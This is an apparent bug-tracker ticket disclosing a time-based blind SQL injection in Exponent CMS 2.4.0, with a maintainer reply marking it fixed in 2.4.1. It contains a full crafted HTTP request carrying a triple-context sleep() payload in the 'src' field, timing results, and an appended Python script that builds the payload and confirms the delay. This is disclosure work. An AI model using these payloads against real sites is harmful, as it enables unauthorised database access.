#1390 ✓resolved
Nicky

Blind SQL Injection Vulnerability in Exponent CMS 2.4.0

Reported by Nicky | November 4th, 2016 @ 02:32 AM | in 2.4.1 (closed)

POST /exponent/index.php HTTP/1.1
Content-Length: 865
Content-Type: multipart/form-data; boundary=-----Boundary_GXLNYFRMTV
X-Requested-With: XMLHttpRequest
Referer: http://192.168.118.1:80/exponent/
Cookie: PHPSESSID=671871947f2a01e5a385139b4131c7c1; adminer_key=9481c8797fb634e88f45043b9f1590fe; osp=0000
Host: 192.168.118.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Content-Type: multipart/form-data; boundary=-----Boundary_GVJVYRLGSF

-------Boundary_GVJVYRLGSF
Content-Disposition: form-data; name="action"

update
-------Boundary_GVJVYRLGSF
Content-Disposition: form-data; name="body"

1
-------Boundary_GVJVYRLGSF
Content-Disposition: form-data; name="controller"

text
-------Boundary_GVJVYRLGSF
Content-Disposition: form-data; name="id"

-------Boundary_GVJVYRLGSF
Content-Disposition: form-data; name="int"

-------Boundary_GVJVYRLGSF
Content-Disposition: form-data; name="rank"

-------Boundary_GVJVYRLGSF
Content-Disposition: form-data; name="revision_id"

-------Boundary_GVJVYRLGSF
Content-Disposition: form-data; name="src"

(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/
-------Boundary_GVJVYRLGSF
Content-Disposition: form-data; name="title"

Mr.
-------Boundary_GVJVYRLGSF--

POST (multipart) input src was set to (select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/

Tests performed:
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/ => 18.377 s
(select(0)from(select(sleep(4)))v)/*'+(select(0)from(select(sleep(4)))v)+'"+(select(0)from(select(sleep(4)))v)+"*/ => 12.683 s
(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ => 0.437 s
(select(0)from(select(sleep(2)))v)/*'+(select(0)from(select(sleep(2)))v)+'"+(select(0)from(select(sleep(2)))v)+"*/ => 6.349 s
(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ => 0.624 s
(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ => 0.967 s
(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ => 0.998 s
(select(0)from(select(sleep(4)))v)/*'+(select(0)from(select(sleep(4)))v)+'"+(select(0)from(select(sleep(4)))v)+"*/ => 13.104 s
(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ => 0.234 s

Original value: @footer
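Added example (Python; not part of Nicky's report and not Exponent's code). It models the two things the ticket shows: why the probe in the `src` field fires exactly one sleep() whether the value is interpolated bare, inside single quotes or inside double quotes (a naive single-quote payload is included for contrast), and how the recorded response times are turned into a confirmed/not-confirmed verdict. The UPDATE statement shapes, the table name `items`, the naive payload and the confirmation thresholds are assumptions; the timings are the ones listed above.

```python
"""Model of the triple-context time-based blind SQLi probe from the ticket.

Added illustration, not Exponent's code. The query shapes, the table name
'items' and the thresholds are assumed; the timings are copied from the ticket.
"""
import statistics
from typing import List, Tuple


def build_payload(seconds: int) -> str:
    """Reproduce the probe from the report: the same sleep() subquery is placed
    once for each quoting context (bare, single-quoted, double-quoted); the
    copies meant for the other two contexts are swallowed by a string literal
    or the /* ... */ comment, so exactly one executes whichever context applies."""
    sub = f"(select(0)from(select(sleep({seconds})))v)"
    return f"{sub}/*'+{sub}+'\"+{sub}+\"*/"


def naive_payload(seconds: int) -> str:
    """A single-context probe, assumed here for contrast: only works when the
    value lands inside single quotes."""
    return f"'+(select(0)from(select(sleep({seconds})))v)+'"


# Assumed ways a vulnerable UPDATE could interpolate the 'src' value.
CONTEXTS = {
    "bare": "UPDATE items SET src={p} WHERE id=1",
    "single": "UPDATE items SET src='{p}' WHERE id=1",
    "double": 'UPDATE items SET src="{p}" WHERE id=1',
}


def active_sql(sql: str) -> str:
    """Return the parts of a MySQL statement that reach the parser as code:
    quoted literals become '?', and /* */, -- and # comments are dropped.
    Doubled quotes ('' / "") and backslash escapes inside literals are honoured."""
    out, i, n = [], 0, len(sql)
    while i < n:
        c = sql[i]
        if c in ("'", '"'):
            i += 1
            while i < n:
                if sql[i] == "\\":
                    i += 2
                    continue
                if sql[i] == c:
                    if i + 1 < n and sql[i + 1] == c:
                        i += 2
                        continue
                    break
                i += 1
            i += 1  # step over the closing quote (or run off an unterminated literal)
            out.append("?")
        elif sql.startswith("/*", i):
            end = sql.find("*/", i + 2)
            i = n if end < 0 else end + 2
        elif sql.startswith("-- ", i) or c == "#":
            end = sql.find("\n", i)
            i = n if end < 0 else end + 1
        else:
            out.append(c)
            i += 1
    return "".join(out)


def executed_sleeps(context: str, payload: str, seconds: int) -> int:
    """Count sleep() calls that sit in code (not in a literal or comment) once
    the payload is interpolated into the given context."""
    sql = CONTEXTS[context].replace("{p}", payload)
    return active_sql(sql).count(f"sleep({seconds})")


# (requested sleep seconds, response seconds) as listed in the ticket.
TICKET_TIMINGS: List[Tuple[int, float]] = [
    (6, 18.377), (4, 12.683), (0, 0.437), (2, 6.349), (0, 0.624),
    (0, 0.967), (0, 0.998), (4, 13.104), (0, 0.234),
]


def delay_confirmed(obs: List[Tuple[int, float]], min_factor: float = 1.0) -> bool:
    """Time-based confirmation (thresholds assumed): every sleep(N>0) probe must
    exceed the slowest sleep(0) baseline by at least min_factor * N seconds, and
    the delay must not shrink as N grows. Network jitter alone fails this."""
    baseline = max(t for s, t in obs if s == 0)
    timed = sorted((s, t) for s, t in obs if s > 0)
    if not timed:
        return False
    prev = 0.0
    for s, t in timed:
        if t - baseline < min_factor * s or t < prev:
            return False
        prev = t
    return True


def delay_factor(obs: List[Tuple[int, float]]) -> float:
    """Median of (response - baseline) / N: seconds of delay produced per
    requested sleep second. The ticket's figures give roughly 3."""
    baseline = max(t for s, t in obs if s == 0)
    return statistics.median((t - baseline) / s for s, t in obs if s > 0)


if __name__ == "__main__":
    for ctx in CONTEXTS:
        print(f"{ctx:>6}: triple-context probe fires {executed_sleeps(ctx, build_payload(6), 6)} sleep(),"
              f" naive probe fires {executed_sleeps(ctx, naive_payload(6), 6)}")
    print("delay confirmed:", delay_confirmed(TICKET_TIMINGS))
    print(f"delay factor: {delay_factor(TICKET_TIMINGS):.2f}")
```

The factor of about 3 is an observation from the ticket's own numbers (each request took close to three times the requested sleep), not something the confirmation logic depends on; the verdict only requires that the delay scale with N above the sleep(0) baseline.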

Comments and changes to this ticket

  • dleffler

    dleffler November 4th, 2016 @ 07:59 AM

    • State changed from “new” to “resolved”
    • Assigned user changed from “expNinja” to “dleffler”
    • Milestone set to 2.4.1

    This has already been addressed in the pre-release code 'develop' branch which will be released as 2.4.0patch1 today.


Bug Tracker for Exponent CMS